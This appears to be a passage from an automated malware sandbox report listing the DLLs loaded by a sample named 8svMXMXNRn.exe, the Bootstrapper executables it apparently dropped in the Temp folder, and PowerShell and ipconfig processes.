                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: mmdevapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: audioses.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Bootstrapper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
